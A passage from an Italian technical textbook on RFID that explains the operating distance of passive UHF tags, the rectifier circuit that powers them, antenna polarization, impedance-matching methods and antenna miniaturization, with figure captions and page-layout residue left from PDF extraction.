La massima distanza operativa può essere inferiore al range di attiva-zione, poiché è necessario non solo che i dispositivi siano attivi, ma ancheche il tasso d’errore BER nella trasmissione TAG→Reader risulti inferioreal valore massimo consentito (tipicamente 10-3) e conseguentemente ladistanza operativa dipende anche dall’indice di modulazione m.Riassumendo quanto esposto, le condizioni necessarie al funzionamen-

to di un sistema RFID sono le seguenti:– attivazione del TAG: PTAG_IN ≥ PTAG_MIN– corretta demodulazione da parte del Reader cioè BER ≤ BERMAX, cheimplica a sua volta:• segnale ricevuto dal Reader sufficientemente intenso(PRDR_IN≥PRDR_MIN);

• adeguato indice di modulazione.

RFID - Fondamenti di una tecnologia silenziosamente pervasiva160

Figura III.13[61] Coefficiente ρT e indice di modulazione

m al variare di ZA_TAG=RA_TAG+jXA_TAG

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 160

Page 154: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

La distanza operativa in condizioni di propagazione in spazio liberopuò essere espressa allora nel seguente modo:

Nella quale:– d1 rappresenta la distanza di attivazione del TAG che si ottiene, a par-tire dalla formula di Friis conoscendo potenza minima necessaria perl’alimentazione del TAG, PTAG_MIN:

– d2 rappresenta la distanza per cui BER=BERMAX ed è ricavabile dallaformula seguente [61]:

In cui YRDR_x è l’ammettenza di carico ai terminali dell’antenna del Reader.Usualmente si ha che dop= d1 < d2.

CIRCUITO DI ALIMENTAZIONE DEL TAG

Questo blocco circuitale è presente nei TAG allo scopo di fornire ener-gia per l’alimentazione della logica di controllo e del modulatore. In altritermini questo circuito estrae la componente energetica dal segnale cap-tato dall’antenna per fornire alimentazione alle altre componenti circui-tali del TAG.Questa sezione è la medesima sia nel caso induttivo sia in quello elettro-

magnetico in quanto opera sul segnale a valle dell’antenna ricevente delTAG e quindi risulta svincolata dalla modalità di ricezione. Variano tutta-via le frequenze operative e quindi può variare la tecnologia realizzativa.Una configurazione circuitale che presenta alcuni vantaggi da un punto

di vista della semplicità di adattamento all’antenna ricevente del TAG,

PARTE III - ACCOPPIAMENTO, ENERGIA & ANTENNE NEI TAG PASSIVI161

III.3.3

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 161

Page 155: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

della minimizzazione delle correnti di perdita dei condensatori e delleriflessioni di componenti armoniche del segnale è quella denominata “ret-tificatore di Greinacher modificato” riportata in Fig. III.14, tratta da [55],a cui si rimanda per i dettagli sulla costruzione e sul principio di funzio-namento.Il circuito è costituito dalla cascata di due stadi simili ciascuno dei

quali opera, tra l’altro, una duplicazione di tensione. Si ha quindi, in tota-le una moltiplicazione per 4 della tensione in ingresso che consente diportare la tensione di uscita (di alimentazione del TAG) a valori prossi-mi a 1,2 V che costituisce la minima tensione di lavoro di gran parte degliattuali TAG.

Ciascuno stadio, che può essere denominato come circuito rettificato-re ad onda piena e duplicatore di tensione, è costituito a sua volta da duemoduli in cascata:– un regolatore di livello (clamping) che ha lo scopo di riportare la dina-mica del segnale a soli valori di segno concorde.

– un rivelatore di inviluppo (envelope detector) che ha lo scopo di retti-ficare il segnale all’uscita del regolatore di tensione generando un valo-re di tensione pressoché costante.Entrambi i moduli sono opportunamente duplicati, in maniera simme-

trica, per operare sia sulle parti positive sia su quelle negative del segnale.L’uscita del circuito sarà quindi una tensione continua centrata intornoallo zero di valore assoluto pari al doppio dell’escursione massima delsegnale d’ingresso (duplicazione di tensione).Per realizzare tale circuito vengono impiegati diodi a bassa tensione di

soglia (Schottky) e condensatori di elevata qualità che consentono diminimizzare le perdite e fornire quindi in uscita un valore stabile di ten-sione continua.La condizione ottimale per collegare l’antenna al circuito rettificatore,

dal punto di vista della massimizzazione del trasferimento di potenza dal-l’antenna verso il circuito, si ottiene con l’adattamento di impedenza tra idue componenti.

RFID - Fondamenti di una tecnologia silenziosamente pervasiva162

Figura III.14Rettificatore di Greinacher modificato [ 55]

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 162

Page 156: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

DISTANZA OPERATIVA VS. ORIENTAMENTO DELLE ANTENNE E

POLARIZZAZIONE DEL SEGNALE

Come si è già accennato, l’orientamento del TAG rispetto al Reader pro-voca significative riduzioni nella distanza operativa, fino al caso di nonriuscire a leggerlo.Qui di seguito vengono riassunti i principali fattori da tenere in conto

per il corretto orientamento.Gli apparati con accoppiamento induttivo sono particolarmente sensi-

bili all’orientamento delle antenne che, si ricorda, sono assimilabili agliavvolgimenti primario e secondario di un trasformatore elettrico. L’orientamento ottimale per le spire delle due antenne di TAG e

Reader è quello parallelo tra loro. Gli apparati con accoppiamento EM, sia passivi che attivi, devono

tener conto di due caratteristiche principali delle antenne (sia del Readerche del TAG):- Diagramma di radiazione- Polarizzazione del campo EMIl diagramma di radiazione è la rappresentazione tridimensionale del

guadagno d’antenna, quest’ultimo misurato (in unità logaritmiche–dB)per confronto tra l'antenna considerata e un'antenna di riferimento iso-tropa (cioè che irradia egualmente in tutte le direzioni).Solitamente si preferisce considerare le sezioni orizzontali e verticali

del diagramma (tridimensionale) di radiazione.L’intensità del campo generato da un’antenna è funzione del diagram-

ma di radiazione dell’antenna medesima.Per il trasferimento ottimale di potenza tra Reader e TAG, i vettori di

massima intensità dei diagrammi di radiazione delle due antenne devonoessere allineati. In Figura III.18 e in Figura III.19 sono illustrati i diagram-mi di radiazione di due TAG commerciali.

PARTE III - ACCOPPIAMENTO, ENERGIA & ANTENNE NEI TAG PASSIVI163

III.3.4

Figura III.15Diagramma di radiazione riportato

sull’antenna a dipolo di un TAG UHF

Figura III.16Diagrammi di radiazione di un’antenna

a dipolo

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 163

Page 157: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva164

Figura III.17Schema di costruzione e diagrammi di

radiazione di un’antenna Yagi (usata a voltenei Reader a frequenze elevate).

Figura III.18Diagramma di radiazione di un TAG UHF con

antenna a dipoloAlien Technology - mod. ALN-9540

Figura III.19Diagramma di radiazione di un TAG UHF con

antenna omnidirezionale Alien Technology - mod. ALN-9534

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 164

Page 158: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

Polarizzazione del campo EM

Il campo EM è rappresentabile con due vettori campo elettrico E e magne-tico H ortogonali tra loro e rispetto all’asse (X) di propagazione del segnale. Se la direzione dei due vettori rimane inalterata e solo l’intensità ed il

verso variano in modo sinusoidale, il segnale si dice polarizzato linearmente.Se i vettori del campo elettrico E e magnetico H ruotano attorno all’as-

se X (direzione di propagazione del segnale), il segnale è detto a polariz-zazione circolare.Una direzione parallela dei due vettori di campo elettrico (e necessaria-

mente anche dei due di campo magnetico) delle antenne del TAG e delReader provoca il massimo trasferimento di energia. In altri termini, se le antenne sono a polarizzazione lineare è necessario

che i relativi dipoli siano paralleli.Se almeno una della antenne è a polarizzazione circolare, quest’ultima

condizione non è necessaria ed è sufficiente che coincidano gli assi di mas-sima propagazione del segnale.

PROGETTO DI ANTENNE PER TAG PASSIVI UHFLe antenne dei TAG per RFID UHF sono per la maggior parte evoluzio-ni del semplice dipolo planare, modificato per introdurre meccanismi diadattamento coniugato e di riduzione dell’ingombro. Le geometrie risul-tanti hanno spesso forme non immediatamente riconducibili al dipolo mapossono essere catalogate in base ai principi fisici che implementano.I paragrafi che seguono forniscono una rassegna generale delle più

comuni procedure di progetto per la miniaturizzazione di antenne perTAG aventi impedenza complessa adattata al microchip. Particolareattenzione è dedicata ai principi di funzionamento delle configurazioni dibase che opportunamente modificate e combinate, permettono di ottene-re una gran varietà di geometrie di TAG. Per ciascuna soluzione proget-tuale è messo in evidenza il ruolo dei principali parametri geometrici sul-l’adattamento complesso di impedenza tramite l’introduzione di carte diadattamento che risultano un utile strumento per adattare una stessa fami-glia di antenne a differenti tipologie di microchip.

PARTE III - ACCOPPIAMENTO, ENERGIA & ANTENNE NEI TAG PASSIVI165

Figura III.20Onda EM

III.4

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 165

Page 159: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

METODI PER L’ADATTAMENTO COMPLESSO DI IMPEDENZA

Questa sezione introduce varie tecniche per ottenere l’adattamento com-plesso di un TAG, quali il T-match, l’accoppiamento per prossimità e l’ac-coppiamento tramite slot.Avendo fissato la potenza effettiva EIRPR trasmessa dal reader e la sen-

sibilità Pchip del microchip sul TAG, e cioè la potenza a radiofrequenzarichiesta dall’elettronica del microchip per portarsi nello stato ‘on’ ed ese-guire la modulazione di back-scattering, la massima distanza di attivazio-ne del TAG [113] lungo la direzione (θ,φ ), nell’ipotesi di adattamento inpolarizzazione tra le antenne del Reader e del TAG, è data da

dove Gtag(θ,φ) è il guadagno del TAG ed il fattore

è il coefficiente di trasmissione in potenza che tiene conto dell’eventualedisadattamento di impedenza tra l’antenna (ZA=RA+jZA) ed il microchip(Zchip=Rchip+jZchip). L’impedenza d’ingresso del microchip ha una partereattiva molto più elevata di quella resistiva. Infatti, poiché il microchipinclude uno stadio di immagazzinamento di energia, la sua reattanza d’in-gresso è capacitiva con valori, che per la maggior parte degli ASIC(Application Specific Integrated Circuit) RFID in UHF, è dell’ordine di -100Ω ÷ -400Ω [72], [73], [74], mentre la resistenza ha valori circa diecivolte inferiori.L’impedenza d’ingresso dell’antenna deve quindi essere induttiva, con

un elevato angolo di fase, atan(ZA)>45°, in modo da ottenere il correttoadattamento coniugato. Per distanze superiori a dmax la potenza raccoltadal TAG decresce al disotto della sensibilità del microchip ed il TAGdiventa irraggiungibile.Volendo ottenere dispositivi a basso costo, non è conveniente introdur-

RFID - Fondamenti di una tecnologia silenziosamente pervasiva166

III.4.1

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 166

Page 160: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

re reti di adattamento a componenti discreti da interporre tra antenna emicrochip, mentre invece si fa in modo di integrare meccanismi di sinto-nizzazione direttamente all’interno della geometria dell’antenna del TAG. Molteplici geometrie di alimentazione possono essere utilizzate per

modificare l’impedenza d’ingresso di un’antenna convenzionale. Tra lepiù comuni ci sono versioni modificate del ben noto T-match, popolaretra i radioamatori, l’accoppiamento induttivo tramite un piccolo loop el’accoppiamento tramite slot ricavata nel corpo dell’elemento radiantestesso. Una buona strategia di adattamento dovrebbe consentire una sin-tonia quasi indipendente della parte reale e della parte immaginaria agen-do su un numero piccolo di parametri geometrici.Saranno ora descritte e comparate alcune di queste tecniche di adatta-

mento, nell’ipotesi di aver posto per semplicità la massima dimensionedelle varie antenne uguale a mezza lunghezza d’onda senza soffermarsisulla specifica applicazione. Le problematiche della miniaturizzazioneverranno descritte nella sezione successiva.Le potenzialità di sintonia degli schemi di alimentazione considerati

verranno discusse tramite carte di adattamento nelle quali la resistenza e lareattanza d’ingresso vengono correlate alla variazione dei più rilevantiparametri geometrici dell’antenna. Una soluzione di adattamento è tantopiù agile quanto più le iso-linee di resistenza e reattanza formano un gri-gliato cartesiano.

4.1.1 Adattamento con T-match

Con riferimento alla Figura III.21, l’impedenza d’ingresso di un dipolo (afilo o planare) di lunghezza l può essere modificata introducendo unostub in corto-circuito [75], [76] centrato rispetto a tale dipolo. Più in det-taglio, la porta di alimentazione, ove sarà connesso il microchip, è postasu un secondo dipolo, di lunghezza a ≤ l, connesso al primo tramite duesegmenti di raccordo. La corrente elettrica si distribuisce sui due radiato-ri in base ai loro spessori. Si può dimostrare, [75], [76], che l’impedenza nella porta dell’antennarisultante è data da

PARTE III - ACCOPPIAMENTO, ENERGIA & ANTENNE NEI TAG PASSIVI167

Figura III.21Configurazione a T-match per dipoli e circuito

elettrico equivalente dove il rapporto dielevazione di impedenza (1+α) è dipendente

dalle sezioni dei due conduttori verticali

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 167

Page 161: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

dove è l’impedenza d’ingresso dello stub in corto-circui-to formato dai conduttori del T–match e da una parte del dipolo di lun-ghezza pari al T-match; è l’impedenza caratteristi-ca di una linea di trasmissione a due conduttori a mutua distanza b; ZA èl’impedenza del dipolo di partenza prelevata al centro in assenza del T-match; re=0.25w and sono i raggi equivalenti del dipolo del T-match, supposti essere tracce planari e è il fattore didivisione di corrente tra i due conduttori.I parametri geometrici a, b e la larghezza della traccia w’ possono essere

aggiustati in modo che l’impedenza d’ingresso della struttura finale risultiadattata al microchip. Il T-match agisce come un trasformatore di impeden-za (Figura III.21): nel caso in cui il dipolo sia lungo mezza lunghezza d’on-da, l’impedenza d’ingresso risultante alla porta del T-match è induttiva,mentre per dipoli più corti può essere sia capacitiva che induttiva.

RFID - Fondamenti di una tecnologia silenziosamente pervasiva168

Figura III.22Carta di adattamento per il T-match in FiguraIII.21 nel caso di l=λ/2, w= λ/100, w’= w/3 e

ZA=75Ω.

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 168

Page 162: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

A titolo d’esempio, la Figura III.22 mostra la carta di adattamento perla geometria del T-match, avendo fissato il rapporto tra le sezioni dei dueelementi verticali a w/w’=3. Le isolinee di resistenza e la reattanza d’in-gresso dipendono da ambedue le dimensioni a e b dello stub, ma con dif-ferenti modalità. In particolare, si può facilmente verificare dalla (3) chea un aumento del rapporto w/w’ corrisponde un innalzamento dell’impe-denza e le iso-linee per la resistenza e la reattanza diventano all’incircaverticali e mutualmente parallele (forte dipendenza dalla dimensione b)permettendo quindi solo una modesta agilità di adattamento.

Da un punto di vista realizzativo, il T-match può essere anche fisi-camente innestato nel radiatore principale, ottenendo geometrie compat-te come in Figura III.23.

4.1.2 Adattamento con Loop accoppiato

Il dipolo radiante può essere altresì accoppiato alla porta di alimentazio-ne tramite un piccolo loop posto a poca distanza (Figura III.24) dal dipo-lo. I terminali del loop sono connessi direttamente al microchip. Questaconfigurazione aggiunge una induttanza equivalente all’impedenza d’in-gresso del dipolo. L’entità dell’accoppiamento tra dipolo e loop di alimen-tazione, e quindi il valore della reattanza aggiunta, è controllata dalladistanza tra il loop ed il dipolo e dal fattore di forma del loop.L’accoppiamento induttivo può essere modellato con un trasformatore

e l’impedenza d’ingresso della geometria risultante, vista nel centro delloop, è data da

dove è l’impedenza d’ingresso del loop isolato. Nelcaso in cui il dipolo abbia una lunghezza risonante, la reattanza d’ingres-so dell’intera struttura dipende dall’induttanza del loop Lloop, mentre laresistenza d’ingresso si può associare alla sola induttanza mutua M:

PARTE III - ACCOPPIAMENTO, ENERGIA & ANTENNE NEI TAG PASSIVI169

Figura III.23Esempio di T-match innestato nel corpo del

radiatore principale. Questa antenna è stataproposta per essere arrotolata su rulli di

carta industriale [77] (cfr. Figura II.11).

Figura III.24Layout dell’adattamento tramite loop

accoppiato e suo circuito equivalente. Iparametri RA, CA, LA rappresentano il

modello dell’elemento radiante in prossimitàdella sua risonanza serie.

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 169

Page 163: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

Nell’ipotesi di elemento radiante (dipolo) infinitamente esteso, l’indut-tanza del loop e il mutuo accoppiamento M possono essere espressi attra-verso formule analitiche [79] in termini delle dimensioni del loop e dellasua distanza dal dipolo. E’ ad ogni modo utile riportare che la resistenzad’ingresso è funzione sia della forma del loop che della distanza loop-dipolo, mentre la reattanza è principalmente legata alla forma del loop.La Fig. III.25 mostra un esempio di carta di adattamento, ottenuta

simulando la risposta dell’antenna con il Metodo dei Momenti [80], nelparticolare caso di dipolo risonante (l=λ/2) e loop quadrato (a=b). Come

atteso dalla (5), la reattanza d’ingresso è pocosensibile alle variazioni della distanza d e le cor-rispondenti iso-linee tendono ad essere verticali.Invece, per un fissato valore delle dimensioni delloop, la resistenza si riduce quando la distanzadipolo-loop aumenta. A partire da queste consi-derazioni, il progetto della configurazione puòessere eseguito dimensionando prima il loop inmodo da cancellare l’impedenza capacitiva delmicrochip e poi determinando la distanza d inmodo da adattare la parte reale del microchip. Questa soluzione di adattamento è particolar-

mente utile nel caso di chip con impedenza adelevato angolo di fase.

4.1.3 Adattamento con Slot innestata

TAG realizzati con dipoli planari o patch sospesi possono essere adattatianche tramite una slot (Fig. III.26 in alto a sinistra) ricavata nel condutto-re stesso [81], [82]. Per effetto della reattanza induttiva di una slot nonrisonante, questa strategia di alimentazione ha rilevanti capacità di adat-tamento nel caso in cui il TAG sia apposto su materiali ad elevata permet-tività, quali ad esempio il corpo umano (Fig. III.26 in alto a destra). Il pro-

RFID - Fondamenti di una tecnologia silenziosamente pervasiva170

Figura III.25carta di adattamento per dipoli alimentati

con loop accoppiato (cfr. Fig. III.24), avendofissato l=λ/2, w= λ/100,

w’= w/3 and a=b (loop quadrato)

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 170

Page 164: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

filo della slot può essere considerato come untrasformatore di impedenza, ove ciascuna dis-continuità produce irradiazione ed immagazzina-mento di energia. Incrementando il numerodelle discontinuità si hanno ulteriori gradi dilibertà con possibilità di miniaturizzare il TAG eottenere geometrie multi-banda [83].Poiché le dimensioni della slot possono essere

comparabili con la superficie del patch, le carat-teristiche di radiazione sono associate all’effettocombinato di slot e patch sospeso. In particolare,il guadagno d’antenna è principalmente fissatodalla dimensione esterna, l , del patch, mentre

agendo sul fattore di forma della slot interna (parametri a e b) si può otte-nere una sintonia fine dell’impedenza.E’ stato osservato [81] che, nel caso in cui la larghezza della slot sia

molto simile al lato del patch (2b≈l), la reattanza d’ingresso è solo debol-mente variabile con la frequenza e quindi il TAGpuò rimanere ben adattato al microchip su unabanda larga, permettendo quindi di ottenere dis-positivi interoperativi nelle bande RFID-UHFeuropea, statunitense ed asiatica. La Figura III.27 mostra la carta di adattamen-

to per la slot ad ‘H’ su un patch quadrato sospe-so al variare del suo fattore di forma a, b. Laresistenza è maggiormente sensibile alla larghez-za b della slot, mentre la reattanza presenta varia-zioni veloci e all’incirca lineari rispetto ad ambe-due le dimensioni a e b. Le iso-linee di impeden-za costituiscono un grigliato quasi cartesiano edè quindi possibile ottenere l’adattamento per unagrande varietà di microchip, sia a basso che adalto angolo di fase di impedenza.

PARTE III - ACCOPPIAMENTO, ENERGIA & ANTENNE NEI TAG PASSIVI171

Figura III.26in alto) Geometria dell’alimentazione tramite slot

innestata ed esempio di un TAG (dimensioni in[mm]) adatto ad essere posto a contatto con il

corpo umano e ad ospitare sensori; In basso) Circuito equivalente a costanti

distribuite.

Figura III.27Carta di adattamento per la slot innestata su

un patch quadrato sospeso (Fig. III.26).Dimensioni l=λ/2 e d=g=λ/150

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 171

Page 165: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

METODI DI MINIATURIZZAZIONE DELL’ANTENNA

Poiché la maggior parte dei TAG UHF deve essere posta in contatto conoggetti di piccole dimensioni, è spesso richiesto di ridurre lo spazio occu-pato dall’antenna senza che ne consegua un degrado inaccettabile delleprestazioni di lettura. Tra le tante opzioni possibili per miniaturizzareun’antenna per TAG RFID in UHF, le configurazioni più utilizzate con-sistono nel ripiegare più volte il conduttore, mantenento pressoché inva-riata la sua lunghezza lineare, dando così origine a strutture del tipo ameandro (Meander Line Antennas MLA) e ad F- oppure ad L-invertita.Queste geometrie generalmente dispongono di vari gradi di libertà e pos-sono essere efficientemente progettate con procedure automatiche, peresempio non deterministiche, basate sugli Algoritmi Genetici [84]

4.2.1 Miniaturizzazione con Meander Line

Come proposto in [85], il ripiegamento del conduttore di un’antenna adipolo, lungo un profilo a meandro (Fig. III.28), produce una configura-zione filare avente induttanza e capacità distribuita che modificano l’im-pedenza d’ingresso dell’antenna. Per frequenze al disotto della prima riso-nanza, la corrente sui segmenti adiacenti e paralleli è opposta in fase for-mando quindi tratti di linea di trasmissione terminata in corto-circuito.Questi conduttori contribuiscono poco all’irradiazione ma comunque pro-ducono dissipazione di energia per effetto Joule. Una geometria a meanderline presenta risonanze a frequenze molto più basse rispetto ad un dipolorettilineo di egual altezza, a spese però di una riduzione di efficienza che,nel contesto RFID, comporta riduzione della distanza di lettura. Fig. III.29 mostra alcuni esempi di TAG RFID, apparsi nella recente

letteratura scientifica, che fanno uso del concetto di Meander LineAntenna (MLA) per ridurre l’ingombro.(a) MLA equispaziata (f=953MHz) con alimentazione tramite T-match, [86].(b) MLA (f=915MHz) con alimentazione tramite loop accoppiato [87].(c) MLA equispaziata (f=920MHz) caricata con un tratto di conduttore

parassita. La reattanza e la resistenza dell’antenna possono essere controllate accorciando la MLA ed il conduttore parassita [62][88]

RFID - Fondamenti di una tecnologia silenziosamente pervasiva172

Figura III.28Geometria di un’antenna filare a meander

line. L’irradiazione è principalmente dovutaai segmenti orizzontali mentre i segmentiverticali introducono effetti capacitivi. La

lunghezza complessiva del filo determina ilcontributo induttivo alla reattanza.e

III.4.2

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 172

Page 166: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

(d) Il TAG Albano (f=915MHz) costituito da un dipolo doppiamente ripiega-to a formare un profilo ad ‘L’, utile ad essere apposto sullo spigolo di unascatola per ottenere una interrogabilità pressoché omnidirezionale [89].

(e) Antenna multi-conduttore (f=900MHz) con un doppio T-match eduna ripiegatura a spirale. Il conduttore esterno addizionale permettedi allargare la banda qualora il tag sia usato su metalli o dielettrici [90].

(f) TAG MLA a forma di testo corsivo (f=870MHz) [91].(g) Dipolo sagomato lungo su un profilo graduale con T-match [73].(h) TAG a meander line multi-conduttore (f=900MHz) con T-match di

forma circolare. La particolare configurazione della Meander Linepermette di porre in fase le correnti sui vari conduttori, aumentandocosì l’effetto di radiazione [92].

PARTE III - ACCOPPIAMENTO, ENERGIA & ANTENNE NEI TAG PASSIVI173

Figura III.29Esempi di TAG che includono profili a

meander line e alimentazione con T-match eloop. Le dimensioni sono riportate in

lunghezza d’onda.

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 173

Page 167: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

Il profilo delle ripiegature può essere periodi-co, come negli esempi precedenti, oppure otti-mizzato per adattare una particolare impedenzadi microchip con vincoli di spazio, di larghezzadi banda e di guadagno. In Figura III.30 sonopresentate alcune geometrie di TAG MLA, otti-mizzate con un Algoritmo Genetico [85], inmodo che le dimensioni complessive siano infe-riori a λ/5 x λ/5 e che sia massimizzato il prodot-to τGtag, e quindi, implicitamente, la distanza dilettura per varie impedenze di microchip.

4.2.2 Configurazioni ad ‘F’ invertita

In generale, le dimensioni verticali di un monopolo possono essere ridot-te ripiegando parte del conduttore parallelamente al piano di massasecondo una geometria ad ‘L’ che tipicamente presenta bassa resistenza edelevata reattanza capacitiva. Per ottenere una maggior possibilità dituning, la struttura è spesso complicata con un pin di corto circuito tra ilsegmento verticale ed il piano di massa, ottenendo così una geometria ed‘F’ invertita (IFA) (Figura III.31) che può essere interpretata anche comeuna versione a monopolo del T-match, ove il conduttore più lungo siastato ripiegato.Nelle configurazioni invertite, quando la lunghezza complessiva del

conduttore filare è vicina ad λ/4, gli elementi radianti sono principalmen-te i conduttori ortogonali al piano di massa, mentre il conduttore piegato,assieme alla sua immagine, si comporta come una linea di trasmissione cheproduce poca irradiazione ma dissipa energia. Di conseguenza questeconfigurazioni non esibiscono efficienza elevata. Per applicazione ai TAGRFID, le antenne ripiegate vengono tipicamente realizzate in tecnologiaplanare, sostituendo al conduttore filare una strip metallica, in modoanche da favorirne l’apposizione sul target. Le antenne risultanti sono indi-cate come PIFA (antenne planari ad ‘F’ invertita) e, grazie alla presenza del

RFID - Fondamenti di una tecnologia silenziosamente pervasiva174

Figura III.30Esempi di TAG a MLA inclusi in un quadrato

di lato λ/5, adattati alle impedenze dimicrochip indicate da un cerchio nero. L

indica la dimensione totale del conduttore,supposto essere in rame. Lo spessore della

traccia che forma l’antenna è λ/300.

Figura III.31Antenne ripiegate su piano di massa. Ilcerchio bianco indica la posizione del

microchip

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 174

Page 168: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

piano di massa sono particolarmente adatte adospitare elettronica aggiuntiva, batteria, e soprat-tutto ad essere poste in contatto con target metal-lici. Per semplificare inoltre l’interconnessione delmicrochip all’antenna, si fa spesso uso di versionidi PIFA o IFA completamente monostrato [93](coplanar IFA in Figura III.31).Agendo sui parametri a, b, d è possibile adat-

tare una’ampia casistica di microchip, comemostrato nella carta di adattamento di FiguraIII.32 dove per ciascun valore di impedenza siottengono due configurazioni aventi diversa lun-ghezza b del conduttore parallelo al piano di massa.La dinamica di adattamento sembra essere compa-rabile con quella dei TAG con slot innestata.

Alcuni esempi di TAG con profilo invertito sono riportati in Figura III.33:(a) PIFA convenzionale a due strati (f=870MHz) con conduttore quadra-

to. Il punto di connessione al microchip ed il pin di corto-circuito sitrovano su due lati diversi del patch [94].

(b)Doppia PIFA (f=900MHz) a due strati alimentata con un loop com-pletamente integrato nella metallizzazione superiore [95].

(c) IFA coplanare (f=870MHz) con stub addizionali [96].(d) IFA coplanare (f=2450MHz) con ripiegamenti multipli per ottenere

funzionamento nelle bande 2450 MHz e 5300 MHz, [97].

4.2.3 Larghezza di banda

A differenza di antenne convenzionali adattate a 50 Ω, il parametro elet-trico più utile per la definizione della larghezza di banda per un TAGRFID è il guadagno realizzato, piuttosto che il return loss [98]. Infatti, lalarghezza di banda di un TAG è strettamente correlata alla minima distan-za di lettura richiesta per la specifica applicazione e, una volta fissati i vin-coli di potenza, può univocamente essere riferita al parametro τGtag omeglio alla sua variazione con la frequenza.

PARTE III - ACCOPPIAMENTO, ENERGIA & ANTENNE NEI TAG PASSIVI175

Figura III.32Carta di adattamento del TAG IFA coplanare

in Fig. 3 31, avendo fissato w=λ/4, u= λ/2, a=λ/10 e modificando la lunghezza del

conduttore ripiegato e la posizione dialimentazione. La larghezza della traccia concui è realizzato il conduttore piegato dell’IFA

è λ/600.

Figura III.33Esempi di TAG PIFA e IFA modificate aventi

singola o multipla ripiegatura. Le dimensionidel TAG sono indicate come frazione di

lunghezza d’onda.

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 175

Page 169: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

E’ ben noto come le antenne miniaturizzate abbiano banda stretta, emedesimo comportamento si attende per i TAG RFID di piccole dimensio-ni. Sebbene le normative sui sistemi RFID allochino solo una porzione moltostretta di spettro radio, la stabilità delle prestazioni del TAG con la frequen-za è comunque importante, non solo per garantire l’interoperabilità neidiversi Paesi, ma soprattutto per ottenere una certa insensibilità del TAG allaparticolare tipologia di target e all’interazione con l’ambiente circostante.Al fine di introdurre una definizione generale di larghezza di banda,

indipendente dalla specifica applicazione, si considera come TAG di rife-rimento un’antenna isotropica perfettamente adattata ([τGtag]0=1)ad unqualsivoglia microchip. La banda del TAG è quindi definita come l’inter-vallo di frequenza [fmin, fmax] nel quale il guadagno realizzato è non infe-riore al 50% di quello dell’antenna di riferimento. In formule, la bandacontiene le frequenze f per cui è valida la seguente relazione:

con fc la frequenza di centro-banda. Dalla (1) si deduce che nella bandadel TAG la massima distanza di attivazione risulta sempre superiore acirca il 70% di quella del TAG di riferimento, a parità di altre condizioniesegetiche ed ambientali.Questa definizione permette di confrontare le prestazioni delle antenne

di TAG differenti, a prescindere dalla potenza trasmessa dal reader e dallasensibilità del microchip. Qualora lo specifico TAG sia stato pensato peressere impiegato su oggetti ad elevate perdite, come nel caso di alcuniliquidi o del corpo umano, può essere conveniente utilizzare un’antenna diriferimento con guadagno realizzato ([τGtag]0<1) perché altrimenti lascelta precedente potrebbe risultare eccessivamente penalizzante.Per discutere le prestazioni in termini di banda dei TAG miniaturizza-

ti, sono di seguito analizzate una MLA ed un IFA aventi dimensioni nonsuperiori a 5 × 5cm (circa λ/7 870 MHz), e adattate ad un chip con impe-denza ad alto angolo di fase (Zchip=15-j450Ω). Con riferimento alla

RFID - Fondamenti di una tecnologia silenziosamente pervasiva176

Figura III.34TAG del tipo IFA e MLA aventi dimensioni (in

[mm]) tali da adattare le antenne, allafrequenza f=870 MHz, ad un microchip con

impedenza Zchip=15-j450Ω. In ambedue I casilo spessore della traccia è di 1mm.

2-ParteIIIsilver.qxp:RFID 5-09-2008 15:57 Pagina 176

Page 170: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

Figura III. 34, la MLA è stata ottimizzata auto-maticamente con le tecniche descritte nei para-grafi precedenti, avendo introdotto come unicovincolo che il TAG abbia guadagno massimo.Non sono stati inseriti controlli sulla larghezza dibanda. La struttura risultante è un po’ più piccoladello spazio a disposizione. Il TAG tipo IFA copla-nare richiede invece di occupare tutto lo spazio alfine di poter adattare l’impedenza del microchip.La Figura III.35 mostra le caratteristiche dei

due TAG rispetto alla frequenza (guadagno mas-simo, fattore di trasmissione in potenza e guada-gno realizzato). Il TAG MLA presenta un guada-gno più alto rispetto al TAG IFA e in ambedue i

casi il guadagno è solo debolmente variabile con la frequenza e di conse-guenza la larghezza di banda sarà principalmente associata alla variazione diadattamento di impedenza. La configurazione MLA consente un migliorguadagno realizzato (τGtag =1,46) a 870 MHz rispetto al TAG IFA(τGtag=1,33) con un modesto incremento di distanza di lettura del solo5%.Le caratteristiche di banda, in accordo alla definizione precedente in

